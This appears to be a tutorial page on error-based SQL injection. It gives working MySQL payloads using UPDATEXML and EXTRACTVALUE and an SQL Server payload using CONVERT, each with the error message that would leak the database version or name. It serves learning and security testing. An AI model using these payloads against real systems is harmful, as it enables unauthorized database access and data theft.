Skip to content

Error-Based SQL Injection

Error-based SQLi is an in-band injection technique that relies on forcing the database to generate an error message that contains sensitive information. This is possible when the application is configured to display database errors directly to the user.

When to Use Error-Based SQLi

  • When a UNION-based attack is not possible (e.g., the query is not a SELECT statement).
  • When the application displays detailed database errors but does not return query results in the page.

Methodology and Payloads

The goal is to execute a subquery that retrieves sensitive data and then pass its result to a function that will cause an error, embedding the data in the error message.

MySQL (UPDATEXML and EXTRACTVALUE)

The UPDATEXML and EXTRACTVALUE functions in MySQL take an XML string and an XPath expression. If the XPath expression is invalid, the error message includes the invalid expression.

Vulnerable URL: http://example.com/items.php?id=1

Payload using UPDATEXML: 

-- The CONCAT function creates an invalid XPath character (~) followed by our subquery result.
' AND (UPDATEXML(1, CONCAT(0x7e, (SELECT @@version)), 1))--
Expected Error Message: 
XPATH syntax error: '~5.7.24-0ubuntu0.18.04.1'

Payload using EXTRACTVALUE: 

' AND (EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()))))--
Expected Error Message: 
XPATH syntax error: '~webapp_db'

Microsoft SQL Server (CONVERT)

This technique attempts to convert a value containing a subquery result into a data type that causes an error.

Payload: 

' AND 1=CONVERT(int, (SELECT @@version))--
Expected Error Message: 
Conversion failed when converting the nvarchar value 'Microsoft SQL Server ...' to data type int.